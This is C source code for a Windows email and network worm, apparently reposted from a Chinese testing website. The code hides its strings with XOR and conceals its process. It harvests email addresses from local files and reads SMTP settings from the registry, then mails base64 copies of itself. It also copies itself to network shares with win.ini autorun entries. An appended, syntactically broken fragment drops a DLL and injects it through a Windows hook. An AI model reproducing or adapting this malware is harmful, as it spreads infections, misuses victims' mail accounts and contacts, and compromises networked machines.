void WINAPI worm()
long w0rm_ThreadCodeList[ 3] = {
( long) L0calThread,
( long) Rem0teThread,
( long) MailThread
} ;
char *StrArray[ 66] = {
szCopyRight,
szFakeMsg,
szSetUp,
szWNetOpenEnumA,
szWNetCloseEnum,
szWNetEnumResourceA,
szMPR_DLL,
szWINSOCK_DLL,
szWSAStartup,
szinet_addr,
szgethostbyaddr,
szgethostbyname,
szhtons,
szsocket,
szconnect,
szsend,
szrecv,
szclosesocket,
szWSACleanup,
smtp_str00,
smtp_str01,
smtp_str02,
smtp_str03,
smtp_str06,
smtp_str07,
smtp_str08,
smtp_str09,
smtp_str0B,
smtp_str0C,
smtp_str0D,
smtp_str0E,
smtp_str0F,
smtp_newline,
smtp_separator,
szWindir00,
szWindir01,
szWindir02,
szWindir03,
szWindir04,
szWIN_INI,
szSETUP_EXE,
szSYSTEM_EXE,
szADVAPI_DLL,
szRegOpenKeyExA,
szRegQueryValueExA,
szRegCloseKey,
szAccountManager,
szDefaultMail,
szAccounts,
szSMTPserver,
szSMTPemail,
szExt00,
szExt01,
szExt02,
szExt03,
szExt04,
szExt05,
szExt06,
szOutlook,
szCuteFtp,
szInternetExplorer,
szTelnet,
szMirc,
szRegisterServiceProcess,
szKernel32,
szTempFile
} ;
static HANDLE w0rm_hThreadList[ 3] ;
DWORD w0rm_ThreadIDList[ 3] ;
char szModule[ MAX_PATH] ;
char *Param ;
int count ;
int min_threads ;
int max_threads ;
BOOL re_generation ;
MailDone = FALSE ;
for ( count = 0 ; count < 66 ; count++ ) DecryptStr( StrArray[ count]) ;
GetModuleFileNameA( NULL, szModule, MAX_PATH) ;
Param = szModule ;
while( *Param != 0) Param++ ;
Param -= 5 ;
if (( *Param == ´P´) || ( *Param == ´p´))
{
MessageBox( NULL,
szFakeMsg,
szSetUp,
MB_OK | MB_ICONSTOP) ;
re_generation = FALSE ;
max_threads = 1 ;
}
else
{
if ( ( hKERNEL32 = GetModuleHandleA( szKernel32)) != NULL)
{
if ( ( a_RegisterServiceProcess = GetProcAddress( hKERNEL32, szRegisterServiceProcess)) != NULL)
{
a_RegisterServiceProcess ( GetCurrentProcessId(), 1) ;
}
}
re_generation = TRUE ;
max_threads = 3 ;
}
min_threads = 0 ;
do
{
for ( count = min_threads ; count < max_threads ; count++ )
{
w0rm_hThreadList[ count] = CreateThread( NULL,
0,
( LPTHREAD_START_ROUTINE) w0rm_ThreadCodeList[ count],
NULL,
0,
&w0rm_ThreadIDList[ count]) ;
}
for ( count = min_threads ; count < max_threads ; count++ )
{
if ( w0rm_hThreadList[ count] != NULL)
{
WaitForSingleObject( w0rm_hThreadList[ count], INFINITE) ;
CloseHandle ( w0rm_hThreadList[ count]) ;
}
}
if ( MailDone)
{
GetWindowsDirectoryA( szModule, MAX_PATH) ;
strcat( szModule, szWIN_INI) ;
WritePrivateProfileStringA( szWindir00, "run", "", szModule) ;
re_generation = FALSE ;
}
min_threads = 1 ;
if ( re_generation) Sleep( 0x000FFFFF) ;
} while( re_generation) ;
return 0 ;
}
long WINAPI MailThread(long lParam)
{
unsigned int addr ;
struct sockaddr_in server ;
struct hostent *hp ;
WSADATA wsaData ;
HANDLE hFile ;
HANDLE hMap ;
char enc0de_filename[ MAX_PATH] ;
char ShortBuff[ 512] ;
char szSIGN[ 512] ;
char szHELO[ 512] ;
BOOL Success ;
void *lpFile ;
int StrCount ;
int FileSize ;
typedef struct
{
char *Command ;
BOOL WaitReply ;
}
SMTPstr ;
SMTPstr SMTPstrings00[ 2] = { szHELO, TRUE ,
szMAIL_FROM, TRUE } ;
SMTPstr SMTPstrings01[ 11] = { smtp_str03, TRUE ,
szMAIL_FROM+5, FALSE ,
smtp_str06, FALSE ,
smtp_str07, FALSE ,
smtp_separator, FALSE ,
smtp_str08, FALSE ,
smtp_separator, FALSE ,
smtp_str09, FALSE ,
szSIGN, FALSE ,
smtp_separator, FALSE ,
smtp_str0B, FALSE } ;
SMTPstr SMTPstrings02[ 6] = { smtp_str0C, FALSE ,
smtp_separator, FALSE ,
smtp_str0D, FALSE ,
smtp_newline, FALSE ,
smtp_str0E, TRUE,
smtp_str0F, FALSE } ;
WaitC0nnected() ;
if ( !GetSMTP( szSMTPname, szSMTPaddr)) return 0 ;
sprintf( szHELO, "%s %s\n", smtp_str00, szSMTPname) ;
sprintf( szMAIL_FROM, "%s <%s>\n", smtp_str01, szSMTPaddr) ;
sprintf( szSIGN,"\n:)\n\n----\n%s\n\n--", szSMTPaddr) ;
if ( ( hWINSOCK = LoadLibraryA( szWINSOCK_DLL)) == NULL) return 0 ;
a_WSAStartup = ( FARPROC) GetProcAddress( hWINSOCK, szWSAStartup) ;
a_inet_addr = ( FARPROC) GetProcAddress( hWINSOCK, szinet_addr) ;
a_gethostbyaddr = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyaddr) ;
a_gethostbyname = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyname) ;
a_htons = ( FARPROC) GetProcAddress( hWINSOCK, szhtons) ;
a_socket = ( FARPROC) GetProcAddress( hWINSOCK, szsocket) ;
a_connect = ( FARPROC) GetProcAddress( hWINSOCK, szconnect) ;
a_send = ( FARPROC) GetProcAddress( hWINSOCK, szsend) ;
a_recv = ( FARPROC) GetProcAddress( hWINSOCK, szrecv) ;
a_closesocket = ( FARPROC) GetProcAddress( hWINSOCK, szclosesocket) ;
a_WSACleanup = ( FARPROC) GetProcAddress( hWINSOCK, szWSACleanup) ;
if ( ( a_WSAStartup == NULL) ||
( a_inet_addr == NULL) ||
( a_gethostbyaddr == NULL) ||
( a_gethostbyname == NULL) ||
( a_htons == NULL) ||
( a_socket == NULL) ||
( a_connect == NULL) ||
( a_send == NULL) ||
( a_recv == NULL) ||
( a_closesocket == NULL) ||
( a_WSACleanup == NULL))
{
FreeLibrary( hWINSOCK) ;
return 0 ;
}
if ( a_WSAStartup( 0x0001, &wsaData) == SOCKET_ERROR)
{
FreeLibrary( hWINSOCK) ;
return 0 ;
}
if ( isalpha( ( int) szSMTPserver[ 0]))
{
hp = ( struct hostent *) a_gethostbyname( szSMTPname) ;
}
else
{
addr = a_inet_addr( szSMTPname) ;
hp = ( struct hostent *) a_gethostbyaddr( (char *)&addr, 4, AF_INET) ;
}
if ( hp == NULL)
{
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;
return 0 ;
}
memset( &server, 0, sizeof( server)) ;
memcpy( &server.sin_addr, hp->h_addr, hp->h_length) ;
server.sin_family = hp->h_addrtype ;
server.sin_port = a_htons( 25) ;
conn_socket = a_socket( AF_INET, SOCK_STREAM, 0) ;
if ( conn_socket < 0 )
{
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;
return 0 ;
}
if ( a_connect( conn_socket, (struct sockaddr *) &server, sizeof( server)) == SOCKET_ERROR)
{
a_closesocket( conn_socket) ;
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;
}
a_recv( conn_socket, ShortBuff, sizeof ( ShortBuff),0 ) ;
for ( StrCount = 0 ; StrCount < 2 ; StrCount++ )
{
Success = str2socket( SMTPstrings00[ StrCount].Command, SMTPstrings00[ StrCount].WaitReply) ;
if ( !Success) break ;
}
if ( Success)
{
Found = 0 ;
GetWindowsDirectoryA( enc0de_filename, MAX_PATH) ;
enc0de_filename[ 3] = 0 ;
FindPe0ple( enc0de_filename) ;
for ( StrCount = 0 ; StrCount < 11 ; StrCount++ )
{
Success = str2socket( SMTPstrings01[ StrCount].Command, SMTPstrings01[ StrCount].WaitReply) ;
if ( !Success) break ;
}
if ( Success)
{
GetModuleFileNameA( NULL, ShortBuff, MAX_PATH) ;
GetTempPathA( MAX_PATH, enc0de_filename) ;
strcat( enc0de_filename, szTempFile) ;
if ( CopyFileA( ShortBuff, enc0de_filename, FALSE) != 0)
{
if ( ( hFile = CreateFileA( enc0de_filename,
GENERIC_READ,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL)) != INVALID_HANDLE_VALUE)
{
FileSize = GetFileSize( hFile, NULL) ;
if ( ( FileSize != 0xFFFFFFFF) && ( FileSize != 0))
{
if ( ( hMap = CreateFileMappingA( hFile,
NULL,
PAGE_READONLY | PAGE_WRITECOPY,
0,
FileSize,
NULL)) != NULL)
{
if ( ( lpFile = MapViewOfFile( hMap,
FILE_MAP_READ,
0,
0,
FileSize)) != NULL)
{
base64_encode( lpFile, FileSize) ;
for ( StrCount = 0 ; StrCount < 6 ; StrCount++ )
{
if ( ( Success = str2socket( SMTPstrings02[ StrCount].Command,
SMTPstrings02[ StrCount].WaitReply)) == FALSE) break ;
}
if ( Success) MailDone = TRUE ;
UnmapViewOfFile( lpFile) ;
}
CloseHandle( hMap) ;
}
}
CloseHandle( hFile) ;
}
DeleteFileA( enc0de_filename) ;
}
}
}
a_closesocket( conn_socket) ;
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;
return 0 ;
}
//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?
void NetW0rming( LPNETRESOURCE lpnr)
{
LPNETRESOURCE lpnrLocal ;
HANDLE hEnum ;
int count ;
int cEntries = 0xFFFFFFFF ;
DWORD dwResult ;
DWORD cbBuffer = 32768 ;
if ( a_WNetOpenEnum ( RESOURCE_CONNECTED,
RESOURCETYPE_ANY,
0,
lpnr,
&hEnum) != NO_ERROR) return ;
do
{
lpnrLocal = ( LPNETRESOURCE) GlobalAlloc( GPTR, cbBuffer) ;
dwResult = a_WNetEnumResource( hEnum,
&cEntries,
lpnrLocal,
&cbBuffer) ;
if ( dwResult == NO_ERROR)
{
for ( count = 1 ; count < cEntries ; count++ )
{
if ( lpnrLocal[ count].dwUsage & RESOURCEUSAGE_CONTAINER)
{
NetW0rming( &lpnrLocal[ count]) ;
}
else if ( lpnrLocal[ count].dwType = RESOURCETYPE_DISK)
{
Rem0teInfecti0n( lpnrLocal[ count].lpRemoteName) ;
}
}
}
else if (dwResult != ERROR_NO_MORE_ITEMS) break ;
} while ( dwResult != ERROR_NO_MORE_ITEMS) ;
GlobalFree ( ( HGLOBAL) lpnrLocal) ;
a_WNetCloseEnum( hEnum) ;
return ;
}
//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?
void Rem0teInfecti0n( char *szPath)
{
char *dir_name[ 5]= { szWindir00, szWindir01, szWindir02, szWindir03, szWindir04 } ;
WIN32_FIND_DATAA FindData ;
HANDLE hFind ;
char szLookUp[ MAX_PATH] ;
char w0rm0rg[ MAX_PATH] ;
char w0rmD3st[ MAX_PATH] ;
int aux ;
for ( aux = 0 ; aux < 5 ; aux++ )
{
sprintf ( szLookUp, "%s\\%s%s", szPath, dir_name[ aux], szWIN_INI) ;
if ( ( hFind = FindFirstFileA( szLookUp, ( LPWIN32_FIND_DATAA) &FindData)) != INVALID_HANDLE_VALUE)
{
sprintf( w0rmD3st, "%s\\%s\\%s", szPath, dir_name[ aux], szSYSTEM_EXE) ;
if ( GetModuleFileNameA( NULL, w0rm0rg, MAX_PATH) != 0)
{
if ( CopyFileA( w0rm0rg, w0rmD3st, TRUE) != 0)
{
WritePrivateProfileStringA( szWindir00, "run", szSYSTEM_EXE, szLookUp) ;
FindClose ( hFind) ;
break ;
}
}
FindClose ( hFind) ;
}
}
}
//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?
BOOL str2socket( char *msg, BOOL do_recv)
{
int retval ;
char Buffer[ 256];
/* Code used to debug the worm
if ( do_recv)
{
if ( MessageBox( NULL,
msg,
"send() this string ?",
MB_YESNO | MB_ICONQUESTION) == IDNO) return TRUE ;
}
*/
if ( a_send( conn_socket, msg, strlen( msg), 0) == SOCKET_ERROR)
{
a_WSACleanup() ;
return FALSE ;
}
if ( do_recv)
{
retval = a_recv( conn_socket, Buffer, sizeof ( Buffer),0 ) ;
if ( ( retval == SOCKET_ERROR) || ( retval == 0))
{
a_closesocket( conn_socket) ;
a_WSACleanup() ;
return FALSE ;
}
Buffer[ retval] = 0 ;
/* Code used to debug the worm
MessageBox( NULL,
Buffer,
"recv()",
MB_OK | MB_ICONSTOP) ;
*/
}
return TRUE ;
}
//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?
BOOL GetSMTP( char *dest, char *org_email)
{
char szKeyName[ MAX_PATH] ;
char szRes[ MAX_PATH] ;
char *move2low ;
int size ;
HKEY hKey ;
if ( ( hADVAPI = LoadLibraryA( szADVAPI_DLL)) == NULL) return FALSE ;
a_RegOpenKeyExA = ( FARPROC) GetProcAddress( hADVAPI, szRegOpenKeyExA) ;
a_RegQueryValueExA = ( FARPROC) GetProcAddress( hADVAPI, szRegQueryValueExA) ;
a_RegCloseKey = ( FARPROC) GetProcAddress( hADVAPI, szRegCloseKey) ;
if ( ( a_RegOpenKeyExA == NULL) ||
( a_RegQueryValueExA == NULL) ||
( a_RegCloseKey == NULL))
{
FreeLibrary( hADVAPI) ;
return FALSE ;
}
strcpy( szKeyName, szAccountManager) ;
if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
szKeyName,
0,
KEY_QUERY_VALUE,
&hKey) != ERROR_SUCCESS)
{
FreeLibrary( hADVAPI) ;
return FALSE ;
}
size = 64 ;
if ( a_RegQueryValueExA( hKey,
szDefaultMail,
0,
NULL,
szRes,
&size) != ERROR_SUCCESS)
{
a_RegCloseKey( hKey) ;
FreeLibrary( hADVAPI) ;
return FALSE ;
}
a_RegCloseKey( hKey) ;
strcat( szKeyName, szAccounts) ;
strcat( szKeyName, szRes) ;
if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
szKeyName,
0,
KEY_QUERY_VALUE,
&hKey) != ERROR_SUCCESS)
{
FreeLibrary( hADVAPI) ;
return FALSE ;
}
size = 64 ;
if ( a_RegQueryValueExA( hKey,
szSMTPserver,
0,
NULL,
dest,
&size) != ERROR_SUCCESS)
{
a_RegCloseKey( hKey) ;
FreeLibrary( hADVAPI) ;
return FALSE ;
}
size = 64 ;
if ( a_RegQueryValueExA( hKey,
szSMTPemail,
0,
NULL,
org_email,
&size) != ERROR_SUCCESS)
{
a_RegCloseKey( hKey) ;
FreeLibrary( hADVAPI) ;
return FALSE ;
}
a_RegCloseKey( hKey) ;
move2low = org_email ;
while( *move2low != 0)
{
if ( ( *move2low > 64) && ( *move2low < 91)) *move2low = ( char) (* move2low) - 65 + 97 ;
move2low++ ;
}
FreeLibrary( hADVAPI) ;
return TRUE ;
}
//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?
void base64_encode(const void *buf, int size)
{
char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ;
char ok_base64[ 80] ;
char *p = ok_base64 ;
unsigned char *q = ( unsigned char *) buf ;
int i ;
int c ;
int l ;
BOOL SendRes ;
i = l = 0 ;
while( i < size)
{
c = q[ i++] ;
c *= 256 ;
if( i < size) c += q[ i] ;
i++ ;
c *= 256 ;
if( i < size) c += q[ i] ;
i++ ;
p[ 0] = base64[ ( c & 0x00fc0000) >> 18] ;
p[ 1] = base64[ ( c & 0x0003f000) >> 12] ;
p[ 2] = base64[ ( c & 0x00000fc0) >> 6] ;
p[ 3] = base64[ ( c & 0x0000003f) >> 0] ;
if( i > size) p[ 3] = ´=´ ;
if( i > size + 1) p[ 2] = ´=´ ;
p += 4 ;
l += 1 ;
if ( l == 0x013)
{
ok_base64[ 0x04C] = 0x0A ;
ok_base64[ 0x04D] = 0 ;
if ( ( SendRes = str2socket( ok_base64, FALSE)) == FALSE) break ;
p = ok_base64 ;
l = 0;
}
}
if ( SendRes != FALSE)
{
if ( l != 0)
{
ok_base64[ l*4] = 0x0A ;
ok_base64[ l*4] = 0 ;
str2socket( ok_base64, FALSE) ;
}
}
}
//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?
char *DecryptStr( char *DcrStr)
{
char *pos = DcrStr ;
while( *pos != 0)
{
*pos ^= ( char) 0x0FF ;
pos++ ;
}
return DcrStr ;
}
//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?
void FindPe0ple( char *szPath)
{
char szRecursive[ MAX_PATH] ;
char szCurrentDir[ MAX_PATH] ;
char FileExt[ MAX_PATH] ;
char RCPT_TO[ MAX_PATH] ;
WIN32_FIND_DATAA FindData ;
HANDLE hFind ;
HANDLE hFile ;
HANDLE hMap ;
void *lpFile ;
char *lpc01 ;
char *lpc02 ;
char *lpc03 ;
char *lpc04 ;
char auxchar ;
int l00king ;
int addrssize ;
GetCurrentDirectoryA( MAX_PATH, szCurrentDir) ;
if ( SetCurrentDirectoryA( szPath) == FALSE) return ;
hFind = (HANDLE) FindFirstFileA( "*.*", (LPWIN32_FIND_DATAA) &FindData) ;
if ( hFind != INVALID_HANDLE_VALUE)
{
do
{
if ( ( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != ´.´))
{
strcpy (szRecursive,szPath) ;
strcat (szRecursive,FindData.cFileName) ;
strcat (szRecursive,"\\") ;
FindPe0ple( szRecursive) ;
}
else if ( ( FindData.nFileSizeHigh == 0) && ( FindData.nFileSizeLow > 16) && ( !( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != ´.´)))
{
lpc01 = FindData.cFileName ;
lpc02 = NULL ;
while ( *lpc01 != 0)
{
if ( *lpc01 == 46) lpc02 = lpc01 ;
lpc01++ ;
}
lpc01 = FileExt ;
if ( lpc02 != NULL)
{
while ( *lpc02 != 0)
{
if ( ( *lpc02 > 97) && ( *lpc02 < 123)) *lpc01 = ( char) ( *lpc02 - 97 + 65) ;
else *lpc01 = *lpc02 ;
lpc01++ ;
lpc02++ ;
}
FileExt[ 4] = 0 ;
if ( ( strcmp( FileExt, szExt00) == 0) ||
( strcmp( FileExt, szExt01) == 0) ||
( strcmp( FileExt, szExt02) == 0) ||
( strcmp( FileExt, szExt03) == 0) ||
( strcmp( FileExt, szExt04) == 0) ||
( strcmp( FileExt, szExt05) == 0) ||
( strcmp( FileExt, szExt06) == 0))
{
if ( ( hFile = CreateFileA( FindData.cFileName,
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL)) != INVALID_HANDLE_VALUE)
{
if ( ( hMap = CreateFileMappingA( hFile,
NULL,
PAGE_READONLY,
0,
FindData.nFileSizeLow,
NULL)) != NULL)
{
if ( ( lpFile = MapViewOfFile( hMap,
FILE_MAP_READ,
0,
0,
FindData.nFileSizeLow)) != NULL)
{
lpc01 = lpFile ;
addrssize = FindData.nFileSizeLow ;
l00king = 0 ;
while( ( addrssize > 16) && ( Found < 16))
{
if ( *lpc01 == 60)
{
l00king = 1 ;
lpc02 = lpc01 ;
}
if ( ( *lpc01 == 64) && ( l00king == 1))
{
l00king = 2 ;
}
if ( ( *lpc01 == 62) && ( l00king == 2))
{
lpc03 = szSMTPaddr ;
lpc04 = lpc02 + 1 ;
while ( *lpc03 != 0)
{
auxchar = *lpc04 ;
if ( ( auxchar > 64) && ( auxchar < 91)) auxchar = auxchar - 65 + 97 ;
if ( *lpc03 != auxchar)
{
l00king = 0 ;
break ;
}
lpc03++ ;
lpc04++ ;
}
if ( l00king == 0)
{
strcpy( RCPT_TO, smtp_str02) ;
lpc03 = RCPT_TO + 9 ;
while ( *lpc02 != 62)
{
*lpc03 = *lpc02 ;
lpc02++ ;
lpc03++ ;
}
*lpc03 = 62 ;
lpc03++ ;
*lpc03 = 0 ;
strcat( RCPT_TO, "\n") ;
str2socket( RCPT_TO, TRUE) ;
Found++ ;
}
else l00king = 0 ;
}
if ( ( *lpc01 < 64) &&
( *lpc01 != 46) &&
( *lpc01 != 60) &&
( *lpc01 != 62))
{
l00king = 0 ;
}
if ( *lpc01 > 122)
{
l00king = 0 ;
}
lpc01++ ;
addrssize-- ;
}
UnmapViewOfFile( lpFile) ;
}
CloseHandle( hMap) ;
}
CloseHandle( hFile) ;
}
}
}
}
}
while ( ( FindNextFile( hFind, &FindData) !=0) && ( Found < 16)) ;
FindClose( hFind) ;
}
return ;
}
//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?
void WaitC0nnected( void)
{
InetActivated = FALSE ;
while ( !InetActivated)
{
EnumWindows( EnumWindowsProc, ( LPARAM) NULL) ;
Sleep( 0x01770) ;
}
return ;
}
//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?
BOOL CALLBACK EnumWindowsProc( HWND hwnd, LPARAM lParam)
{
int CaptionLen ;
int AwareLen ;
int CompareLen ;
int InetAware ;
int EquChar ;
int aux0 ;
int aux1 ;
char *Foll0w ;
char *PtrAware ;
char WindowCaption[ 1024] ;
CaptionLen = GetWindowText( hwnd, WindowCaption, 1024) ;
if ( CaptionLen > 0)
{
Foll0w = WindowCaption ;
while( *Foll0w != 0)
{
if ( ( *Foll0w >= ´a´) && ( *Foll0w <= ´z´)) *Foll0w = *Foll0w - ´a´ + ´A´ ;
Foll0w++ ;
}
for( InetAware = 0 ; InetAware < 5 ; InetAware++)
{
AwareLen = strlen( szAware[ InetAware]) ;
if ( AwareLen < CaptionLen)
{
CompareLen = CaptionLen - AwareLen ;
for ( aux0 = 0 ; aux0 < CompareLen ; aux0++ )
{
EquChar = 0 ;
Foll0w = &WindowCaption[ aux0] ;
PtrAware = szAware[ InetAware] ;
for ( aux1 = 0 ; aux1 < AwareLen ; aux1++ , Foll0w++ , PtrAware++ )
{
if ( *Foll0w == *PtrAware) EquChar++ ;
}
if ( EquChar == AwareLen)
{
InetActivated = TRUE ;
break ;
}
aux0++ ;
}
}
}
}
return ( !InetActivated) ;
}
void TFTP32()
{
HANDLE hFile=CreateFile("TFTP32.DLL",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
//printf("\nCreate file %s failed:%d",RemoteFilePath,GetLastError());
return -1
}
//写文件内容
DWORD i=0,dwIndex=0,dwWrite,dwSize=sizeof(tftpdllbuff)
while(dwSize>dwIndex)
{
if(!WriteFile(hFile,&tftpdllbuff[dwIndex],dwSize-dwIndex,&dwWrite,NULL))
{
//printf("\nWrite file %s failed:%d","TFTP32.DLL",GetLastError());
return -1
}
dwIndex+=dwWrite;
}
//关闭文件句柄
CloseHandle(hFile);
hhook hk
STARTUPINFO si;
PROCESS_INFORMATION pi;
memset(&si,0,sizeof(si));
si.hStdError = si.hStdOutput = wp1;
si.hStdInput = rp2;
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
si.lpReserved=0;
si.lpReserved2=0;
si.cbReserved2 =0;
si.cb = sizeof(si);
//this two must not exchange
CreateProcess(0, "Explorer.exe", 0, 0, 1, 0, 0, 0, &si, &pi)
Hookproc hkprc
static HINSTANCE hinstDLL
hinstDLL=LoadLibrary((LPCTSTR)"TFTP32.DLL")
hkprc=(HOOKPROC)GetProcAddress(hinstDLL,"hook")
hk=SetWindowsHookEx(WH_CBT,hkprc,HinstDLL,pi.wdthreadID)
FreeLibrary(hinstDLL)
}
文章来源于领测软件测试网 https://www.ltesting.net/